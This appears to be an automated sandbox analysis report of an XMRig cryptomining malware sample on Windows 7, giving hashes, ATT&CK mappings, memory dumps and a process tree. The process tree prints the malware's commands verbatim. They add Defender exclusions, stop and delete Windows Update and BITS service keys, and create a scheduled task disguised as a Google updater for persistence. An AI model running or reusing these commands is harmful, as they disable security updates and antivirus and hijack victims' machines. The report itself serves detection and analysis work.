xmrig | 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d

Analysis

max time kernel
150s
max time network
142s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
30-09-2022 17:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

41382215636e83ce55d622ce7f15733a.exe
Size

4.0MB
MD5

41382215636e83ce55d622ce7f15733a
SHA1

aff94de054bb404000c010c4713998ddc6905626
SHA256

2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d
SHA512

94216303bf4455bc2a8de631c453bef013c1fab36f28c167c3488730d430713f0f117561bff3137697732b3bf16cab74b772fad79a36fc7c06e5be6fbaafe98d
SSDEEP

98304:jgFNGMRUCTguDUdjIF1qZHEfgg1AE1AQamhsDUoYX4:jYN7bThDUdj+qxEYGAE1AQuR

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1496-132-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1496-137-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

2028 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2028	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1496-132-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1496-137-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

608 taskeng.exe

pid	process
608	taskeng.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 2028 set thread context of 1120	2028	updater.exe	conhost.exe
PID 2028 set thread context of 1496	2028	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1952 sc.exe
1228 sc.exe
1708 sc.exe
840 sc.exe
1704 sc.exe
576 sc.exe
1544 sc.exe
1900 sc.exe
1404 sc.exe
1924 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2000 schtasks.exe
1164 schtasks.exe

pid	process
1952	sc.exe
1228	sc.exe
1708	sc.exe
840	sc.exe
1704	sc.exe
576	sc.exe
1544	sc.exe
1900	sc.exe
1404	sc.exe
1924	sc.exe

pid	process
2000	schtasks.exe
1164	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
1496	powershell.exe
868	powershell.exe
804	powershell.exe
1976	powershell.exe
1724	powershell.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe
1496	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2028	updater.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: SeDebugPrivilege	2028	updater.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: SeLockMemoryPrivilege	1496	dwm.exe
Token: SeLockMemoryPrivilege	1496	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

41382215636e83ce55d622ce7f15733a.execmd.exepowershell.exepowershell.exetaskeng.exeupdater.execmd.exe

description	pid	process	target process
PID 1468 wrote to memory of 1496	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 1496	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 1496	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 332	1468	41382215636e83ce55d622ce7f15733a.exe	cmd.exe
PID 1468 wrote to memory of 332	1468	41382215636e83ce55d622ce7f15733a.exe	cmd.exe
PID 1468 wrote to memory of 332	1468	41382215636e83ce55d622ce7f15733a.exe	cmd.exe
PID 1468 wrote to memory of 868	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 868	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 868	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 332 wrote to memory of 1708	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1708	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1708	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1404	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1404	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1404	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1924	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1924	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1924	332	cmd.exe	sc.exe
PID 332 wrote to memory of 840	332	cmd.exe	sc.exe
PID 332 wrote to memory of 840	332	cmd.exe	sc.exe
PID 332 wrote to memory of 840	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1704	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1704	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1704	332	cmd.exe	sc.exe
PID 332 wrote to memory of 1104	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1104	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1104	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1392	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1392	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1392	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1600	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1600	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1600	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1080	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1080	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1080	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1888	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1888	332	cmd.exe	reg.exe
PID 332 wrote to memory of 1888	332	cmd.exe	reg.exe
PID 868 wrote to memory of 2000	868	powershell.exe	schtasks.exe
PID 868 wrote to memory of 2000	868	powershell.exe	schtasks.exe
PID 868 wrote to memory of 2000	868	powershell.exe	schtasks.exe
PID 1468 wrote to memory of 804	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 804	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1468 wrote to memory of 804	1468	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 804 wrote to memory of 1624	804	powershell.exe	schtasks.exe
PID 804 wrote to memory of 1624	804	powershell.exe	schtasks.exe
PID 804 wrote to memory of 1624	804	powershell.exe	schtasks.exe
PID 608 wrote to memory of 2028	608	taskeng.exe	updater.exe
PID 608 wrote to memory of 2028	608	taskeng.exe	updater.exe
PID 608 wrote to memory of 2028	608	taskeng.exe	updater.exe
PID 2028 wrote to memory of 1976	2028	updater.exe	powershell.exe
PID 2028 wrote to memory of 1976	2028	updater.exe	powershell.exe
PID 2028 wrote to memory of 1976	2028	updater.exe	powershell.exe
PID 2028 wrote to memory of 1416	2028	updater.exe	cmd.exe
PID 2028 wrote to memory of 1416	2028	updater.exe	cmd.exe
PID 2028 wrote to memory of 1416	2028	updater.exe	cmd.exe
PID 2028 wrote to memory of 1724	2028	updater.exe	powershell.exe
PID 2028 wrote to memory of 1724	2028	updater.exe	powershell.exe
PID 2028 wrote to memory of 1724	2028	updater.exe	powershell.exe
PID 1416 wrote to memory of 576	1416	cmd.exe	sc.exe
PID 1416 wrote to memory of 576	1416	cmd.exe	sc.exe
PID 1416 wrote to memory of 576	1416	cmd.exe	sc.exe
PID 1416 wrote to memory of 1544	1416	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\41382215636e83ce55d622ce7f15733a.exe
"C:\Users\Admin\AppData\Local\Temp\41382215636e83ce55d622ce7f15733a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:332

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1708

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1404

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1924

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:840

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1704

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1104

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1392

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1600

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1080

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
3⤵
- Creates scheduled task(s)
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zfalrzu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1624

C:\Windows\system32\taskeng.exe
taskeng.exe {08AB94A2-819D-4866-BC83-E244BBA80A1A} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:608

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:576

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1544

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1952

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1900

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1228

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:932

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:1340

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:756

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:464

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
4⤵
- Creates scheduled task(s)
PID:1164

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe llktminrzivp
3⤵
PID:1120

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
4⤵
PID:1788

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
PID:1364

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe qtbgcbbuyarrseoa 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2R15GYAs/dQrH+CfI88Ko8ilwYx+F3flcrT35XvHxF1c
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
088fe243c6c52fdc669358b2408274ad

SHA1
9c3e121adb04a6232d03ecd076909142dcf81e41

SHA256
dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1

SHA512
3b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
088fe243c6c52fdc669358b2408274ad

SHA1
9c3e121adb04a6232d03ecd076909142dcf81e41

SHA256
dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1

SHA512
3b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
088fe243c6c52fdc669358b2408274ad

SHA1
9c3e121adb04a6232d03ecd076909142dcf81e41

SHA256
dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1

SHA512
3b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
088fe243c6c52fdc669358b2408274ad

SHA1
9c3e121adb04a6232d03ecd076909142dcf81e41

SHA256
dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1

SHA512
3b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
memory/332-62-0x0000000000000000-mapping.dmp

Download
memory/464-125-0x0000000000000000-mapping.dmp

Download
memory/576-108-0x0000000000000000-mapping.dmp

Download
memory/744-130-0x0000000000000000-mapping.dmp

Download
memory/756-123-0x0000000000000000-mapping.dmp

Download
memory/796-126-0x0000000000000000-mapping.dmp

Download
memory/804-93-0x00000000026CB000-0x00000000026EA000-memory.dmp

Filesize
124KB

Download
memory/804-92-0x00000000026C4000-0x00000000026C7000-memory.dmp

Filesize
12KB

Download
memory/804-90-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/804-89-0x00000000026C4000-0x00000000026C7000-memory.dmp

Filesize
12KB

Download
memory/804-88-0x000007FEF3190000-0x000007FEF3CED000-memory.dmp

Filesize
11.4MB

Download
memory/804-87-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmp

Filesize
10.1MB

Download
memory/804-84-0x0000000000000000-mapping.dmp

Download
memory/840-69-0x0000000000000000-mapping.dmp

Download
memory/868-73-0x000007FEEEEC0000-0x000007FEEFA1D000-memory.dmp

Filesize
11.4MB

Download
memory/868-71-0x000007FEF3E20000-0x000007FEF4843000-memory.dmp

Filesize
10.1MB

Download
memory/868-63-0x0000000000000000-mapping.dmp

Download
memory/868-81-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/868-82-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/868-83-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/868-79-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/868-76-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

Filesize
3.0MB

Download
memory/932-120-0x0000000000000000-mapping.dmp

Download
